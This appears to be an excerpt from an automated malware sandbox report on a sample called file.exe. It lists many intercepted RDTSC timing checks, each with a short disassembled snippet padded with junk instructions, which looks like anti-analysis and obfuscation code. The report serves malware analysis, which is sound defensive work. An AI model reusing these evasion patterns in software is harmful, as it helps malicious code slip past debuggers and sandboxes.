                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9900B4 second address: 990129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C414h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, cx 0x00000016 mov edi, dword ptr [ebp+122D330Eh] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov di, 89F5h 0x00000027 mov eax, dword ptr [ebp+122D0BE5h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F7CC902C408h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D195Dh], ebx 0x0000004d push FFFFFFFFh 0x0000004f push esi 0x00000050 or edi, 23D9B279h 0x00000056 pop edi 0x00000057 push eax 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932CF3 second address: 932CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7CC8D8AE26h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932CFE second address: 932D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997AF second address: 9997B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997B3 second address: 9997BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997BB second address: 9997C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9998F9 second address: 9998FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9998FF second address: 999926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7CC8D8AE31h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7CC8D8AE2Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FAEA second address: 99FAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FAF0 second address: 99FB15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F7CC8D8AE2Eh 0x00000011 jp 00007F7CC8D8AE28h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FBFD second address: 99FC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C412h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f jmp 00007F7CC902C40Ch 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FC2D second address: 99FC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FC31 second address: 99FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F7CC902C40Ch 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9397DD second address: 9397E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9397E4 second address: 9397EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7CC902C40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3936 second address: 9A393A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A393A second address: 9A3952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F7CC902C40Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3952 second address: 9A3958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3958 second address: 9A3964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7CC902C406h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3964 second address: 9A396E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4261 second address: 9A4266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4266 second address: 9A426C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A426C second address: 9A4276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7CC902C406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4276 second address: 9A4281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4689 second address: 9A468D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A468D second address: 9A46BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7CC8D8AE37h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7CC8D8AE2Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4840 second address: 9A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C417h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A49AD second address: 9A49D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE30h 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jne 00007F7CC8D8AE26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A49D0 second address: 9A49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC42E second address: 9AC46F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7CC8D8AE43h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7CC8D8AE34h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC46F second address: 9AC47F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC47F second address: 9AC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC608 second address: 9AC60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC789 second address: 9AC78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC78F second address: 9AC7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Bh 0x00000007 jp 00007F7CC902C406h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop eax 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7B6 second address: 9AC7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7BE second address: 9AC7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7C2 second address: 9AC7DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC144 second address: 9AC149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC149 second address: 9AC154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7CC8D8AE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC154 second address: 9AC15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC15C second address: 9AC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F7CC8D8AE52h 0x0000000d push ecx 0x0000000e jmp 00007F7CC8D8AE38h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC18B second address: 9AC18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD029 second address: 9AD02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD19A second address: 9AD19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD19E second address: 9AD1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE30h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975462 second address: 97546C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97546C second address: 975470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975470 second address: 9754A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor edx, 2FEC57FFh 0x00000010 lea eax, dword ptr [ebp+124871D1h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F7CC902C408h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 nop 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9754A9 second address: 9754AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9754AD second address: 9754B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9754B1 second address: 9754D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F7CC8D8AE35h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975615 second address: 975628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C40Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9762D9 second address: 9762F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC8D8AE34h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B11CE second address: 9B11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7CC902C40Bh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1494 second address: 9B149A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1616 second address: 9B161B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B161B second address: 9B1625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1625 second address: 9B1636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push esi 0x00000009 jnl 00007F7CC902C406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1636 second address: 9B163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B61BF second address: 9B6200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Bh 0x00000007 jmp 00007F7CC902C414h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7CC902C40Ah 0x00000013 jmp 00007F7CC902C410h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6200 second address: 9B6206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68D4 second address: 9B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68D8 second address: 9B68F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7CC8D8AE37h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6A4D second address: 9B6A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6A51 second address: 9B6A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6D3E second address: 9B6D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6D42 second address: 9B6D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6D48 second address: 9B6D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6D50 second address: 9B6D56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6EE5 second address: 9B6F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F7CC902C406h 0x0000000d jmp 00007F7CC902C417h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B721C second address: 9B7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5EF8 second address: 9B5F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jmp 00007F7CC902C40Ah 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF0F second address: 9BEF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF15 second address: 9BEF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C417h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7CC902C412h 0x00000011 jne 00007F7CC902C406h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF40 second address: 9BEF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F7CC8D8AE26h 0x0000000f jmp 00007F7CC8D8AE2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF5F second address: 9BEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEF69 second address: 9BEF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF0AF second address: 9BF0CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C410h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F7CC902C406h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF0CB second address: 9BF0E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 jno 00007F7CC8D8AE26h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF0E1 second address: 9BF0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1ADC second address: 9C1AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C89A4 second address: 9C89B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C89B6 second address: 9C89D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F7CC8D8AE26h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8B46 second address: 9C8B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7CC902C406h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA6CA second address: 9CA6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB13 second address: 9CDB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7CC902C416h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE103 second address: 9CE107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE107 second address: 9CE10F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE268 second address: 9CE27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F7CC8D8AE26h 0x0000000c jmp 00007F7CC8D8AE2Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE27E second address: 9CE282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE282 second address: 9CE288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE288 second address: 9CE28D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2B1A second address: 9D2B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2B1E second address: 9D2B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9760D8 second address: 9760FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jns 00007F7CC8D8AE34h 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F7CC8D8AE26h 0x00000019 rdtsc
